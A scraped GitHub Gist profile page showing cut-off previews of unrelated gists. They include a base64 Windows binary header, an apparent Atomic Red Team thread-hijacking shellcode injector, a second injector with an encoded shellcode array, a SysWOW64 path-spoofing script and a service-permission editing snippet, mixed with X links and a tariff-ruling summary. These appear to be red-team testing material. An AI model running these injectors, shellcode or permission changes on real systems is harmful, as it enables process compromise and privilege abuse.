Skip to content

Instantly share code, notes, and snippets.

View justaguywhocodes's full-sized avatar

Toussaint Louverture justaguywhocodes

View GitHub Profile
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA+AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAADAIY6ihEDg8YRA4PGEQODxjThz8YZA4PGVxuHwhkDg8ZXG4/CHQODxlcbk8IxA4PGVxuXwj0Dg8c844fCBQODxhEDh8aBA4PEFxunwhkDg8QXG4PCFQODxBcYf8YVA4PEFxuLwhUDg8VJpY2iEQODxAAAAAAAAAABQRQAAZIYGAM2Nm2gAAAAAAAAAAPAAIiALAg4qABAAAAAcAAAAAAAAgBMAAAAQAAAAAACAAQAAAAAQAAAAAgAABgAAAAAAAAAGAAAAAAAAAABwAAAABAAAAAAAAAIAYAEAABAAAAAAAAAQAAAAAAAAAAAQAAAAAAAAEAAAAAAAAAAAAAAQAAAAYCgAAEgAAACoKAAAZAAAAABQAAD4AAAAAEAAALwBAAAAAAAAAAAAAABgAAAsAAAAECMAAHAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADQIQAAQAEAAAAAAAAAAAAAACAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAudGV4dAAAAFgPAAAAEAAAABAAAAAEAAAAAAAAAAAAAAAAAAAgAABgLnJkYXRhAADGDAAAACAAAAAOAAAAFAAAAAAAAAAAAAAAAAAAQAAAQC5kYXRhAAAAgAYAAAAwAAAAAgAAACIAAAAAAAAAAAAAAAAAAEAAAMAucGRhdGEAALwBAAAAQAAAAAIAAAAkAAAAAAAAAAAAAAAAAABAAABALnJzcmMAAAD4AAAAAFAAAAACAAAAJgAAAAAAAAAAAAAAAAAAQAAAQC5yZWxvYwAALAAAAABgAAAAAgAAACgAAAAAAAAAAAAAAAAAAEAAAEIAAAAAAAAAAAAAAAAAAAAA
# Create a custom folder to mimic %windir% structure
$customDir = "C:\Users\integ\OneDrive\Desktop"
New-Item -Path $customDir -ItemType Directory -Force
# Create a SysWOW64 folder inside the custom directory
$syswow64Dir = "$customDir\SysWOW64"
New-Item -Path $syswow64Dir -ItemType Directory -Force
# Copy calc.exe to the custom SysWOW64 folder and rename it to notepad.exe (the targeted binary)
Copy-Item -Path "C:\Windows\System32\calc.exe" -Destination "$syswow64Dir\notepad.exe" -Force
https://x.com/CollinRugg/status/1945255701590499571
// Injector for Atomic Red Team leveraging thread context hijacking (T1055.003) to inject shellcode in Notepad.exe.
// Author: [email protected]
#include <windows.h>
#include <tlhelp32.h>
#include <iostream>
#include <string>
// msfvenom -a x64 --platform windows -p windows/x64/messagebox TEXT="Atomic Red Team" -f csharp
unsigned char shellcode[] = {
In 2025, court decisions significantly impacted Donald Trump's tariff policies, creating legal and economic challenges to his trade agenda. Here’s a concise overview of how these rulings affected his actions, based on available information:U.S. Court of International Trade Ruling (May 28, 2025):The U.S. Court of International Trade (CIT) unanimously ruled that Trump exceeded his authority under the International Emergency Economic Powers Act (IEEPA) by imposing broad "reciprocal" tariffs on virtually all U.S. trading partners, including a 10% universal tariff and higher levies on countries like China (20%), Canada, and Mexico (25%). The court also struck down tariffs justified by drug trafficking concerns, arguing they did not directly address the cited emergencies. The judges, appointed by Reagan, Obama, and Trump himself, found that IEEPA does not grant "unbounded tariff authority" and that Congress holds primary authority over trade. The court ordered a permanent injunction, halting these tariffs and requi
https://pbs.twimg.com/media/GvWahy0WcAAM5SR?format=jpg&name=large
$VarD=$null
$VarS=$null
$ResultsD=$null
$ResultsS=$null
$Service="mslldp"
$AddPermissions="(A;;CCLCSWLOCRRC;;;SU)"
$VarAccount="SU"
[string]$RawResults=sc.exe sdshow $Service
$RegexPatternALL='(D:)(\(.*\))(S:)(\(.*\))|(S:)(\(.*\))|(D:)(\(.*\))'
#include <windows.h>
#include <tlhelp32.h>
#include <stdio.h>
#include <stdlib.h>
unsigned char shellcode[] = {
0x89, 0xe3, 0xd9, 0xe1, 0xd9, 0x73, 0xf4, 0x5d, 0x55, 0x59, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x49, 0x43, 0x43, 0x43, 0x43, 0x43, 0x43, 0x37, 0x51, 0x5a, 0x6a, 0x41, 0x58, 0x50, 0x30, 0x41, 0x30, 0x41, 0x6b, 0x41, 0x41, 0x51, 0x32, 0x41, 0x42, 0x32, 0x42, 0x42, 0x30, 0x42, 0x42, 0x41, 0x42, 0x58, 0x50, 0x38, 0x41, 0x42, 0x75, 0x4a, 0x49, 0x79, 0x6c, 0x68, 0x68, 0x6e, 0x62, 0x43, 0x30, 0x35, 0x50, 0x77, 0x70, 0x65, 0x30, 0x6c, 0x49, 0x78, 0x65, 0x50, 0x31, 0x6b, 0x70, 0x35, 0x34, 0x6c, 0x4b, 0x50, 0x50, 0x36, 0x50, 0x4c, 0x4b, 0x32, 0x72, 0x74, 0x4c, 0x6c, 0x4b, 0x30, 0x52, 0x62, 0x34, 0x6c, 0x4b, 0x63, 0x42, 0x51, 0x38, 0x74, 0x4f, 0x78, 0x37, 0x42, 0x6a, 0x37, 0x56, 0x74, 0x71, 0x69, 0x6f, 0x4c, 0x6c, 0x55, 0x6c, 0x71, 0x71, 0x63, 0x4c, 0x56, 0x62, 0x44, 0x6c, 0x71, 0x30, 0x79, 0x51, 0x38, 0x4f, 0x64, 0x4d, 0x75, 0x51, 0x6b, 0x77, 0x7a, 0x42, 0x38, 0x72, 0x50, 0x52, 0x51, 0x47
https://x.com/CollinRugg/status/1932859224452968532
# Parameters
param (
[Parameter(Mandatory=$true)]
[string]$FilePath,
[Parameter(Mandatory=$true)]
[string]$OriginalFont,
[Parameter(Mandatory=$true)]
[string]$NewFont